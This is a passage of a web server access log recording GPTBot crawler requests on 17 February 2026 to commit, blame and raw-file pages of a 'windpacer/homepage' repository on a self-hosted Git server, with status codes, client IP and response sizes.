+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:13:01:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets" [Client 74.7.227.38] [Length 10699] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets" +[17/Feb/2026:13:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets" [Client 74.7.227.38] [Length 10911] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:13:01:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" +[17/Feb/2026:13:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" [Client 74.7.227.38] [Length 10783] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" +[17/Feb/2026:13:01:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" [Client 74.7.227.38] [Length 11454] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:13:01:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets" [Client 74.7.227.38] [Length 10872] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets" +[17/Feb/2026:13:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" [Client 74.7.227.38] [Length 10015] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:13:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" [Client 74.7.227.38] [Length 10822] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" +[17/Feb/2026:13:01:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" [Client 74.7.227.38] [Length 11576] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" +[17/Feb/2026:13:01:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" +[17/Feb/2026:13:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets" [Client 74.7.227.38] [Length 10481] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets" +[17/Feb/2026:13:01:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js" [Client 74.7.227.38] [Length 9950] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets" +[17/Feb/2026:13:01:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets" [Client 74.7.227.38] [Length 10898] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets" +[17/Feb/2026:13:01:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" [Client 74.7.227.38] [Length 11480] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:13:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" [Client 74.7.227.38] [Length 11889] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:13:01:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" [Client 74.7.227.38] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" +[17/Feb/2026:13:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" [Client 74.7.227.38] [Length 10727] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" +[17/Feb/2026:13:01:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" [Client 74.7.227.38] [Length 11225] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" +[17/Feb/2026:13:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" +[17/Feb/2026:13:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" [Client 74.7.227.38] [Length 9834] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" +[17/Feb/2026:13:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" [Client 74.7.227.38] [Length 10795] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" +[17/Feb/2026:13:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" +[17/Feb/2026:13:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js" [Client 74.7.227.38] [Length 10496] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/js" +[17/Feb/2026:13:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" [Client 74.7.227.38] [Length 11423] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/.gitignore" +[17/Feb/2026:13:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" [Client 74.7.227.38] [Length 9859] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" +[17/Feb/2026:13:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" +[17/Feb/2026:13:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" [Client 74.7.227.38] [Length 10778] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" +[17/Feb/2026:13:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" +[17/Feb/2026:13:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" +[17/Feb/2026:13:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js" [Client 74.7.227.38] [Length 10119] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets" +[17/Feb/2026:13:01:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/types.ts" +[17/Feb/2026:13:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" [Client 74.7.227.38] [Length 10408] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets" +[17/Feb/2026:13:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" [Client 74.7.227.38] [Length 11209] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" +[17/Feb/2026:13:01:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" [Client 74.7.227.38] [Length 10138] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets" +[17/Feb/2026:13:01:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" [Client 74.7.227.38] [Length 9831] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" +[17/Feb/2026:13:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" [Client 74.7.227.38] [Length 10699] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" +[17/Feb/2026:13:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/.gitignore" +[17/Feb/2026:13:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" [Client 74.7.227.38] [Length 11858] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" +[17/Feb/2026:13:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.tsx" +[17/Feb/2026:13:01:58 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js" [Client 74.7.227.38] [Length 10920] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js" +[17/Feb/2026:13:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm" [Client 74.7.227.38] [Length 10165] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" +[17/Feb/2026:13:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" [Client 74.7.227.38] [Length 10100] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" +[17/Feb/2026:13:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm" [Client 74.7.227.38] [Length 10086] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" +[17/Feb/2026:13:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" [Client 74.7.227.38] [Length 9841] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images" +[17/Feb/2026:13:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm" [Client 74.7.227.38] [Length 10160] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js" [Client 74.7.227.38] [Length 9951] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets" +[17/Feb/2026:13:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" [Client 74.7.227.38] [Length 10144] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" +[17/Feb/2026:13:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" [Client 74.7.227.38] [Length 11177] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" +[17/Feb/2026:13:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/vite.config.ts" +[17/Feb/2026:13:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images" [Client 74.7.227.38] [Length 10172] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets" +[17/Feb/2026:13:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.tsx" [Client 74.7.227.38] [Length 11609] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:13:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/js" [Client 74.7.227.38] [Length 10088] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets" +[17/Feb/2026:13:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" [Client 74.7.227.38] [Length 11206] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/vite.config.ts" +[17/Feb/2026:13:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js" [Client 74.7.227.38] [Length 10089] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets" +[17/Feb/2026:13:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html" [Client 74.7.227.38] [Length 11277] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" +[17/Feb/2026:13:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm" [Client 74.7.227.38] [Length 10246] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm" +[17/Feb/2026:13:02:07 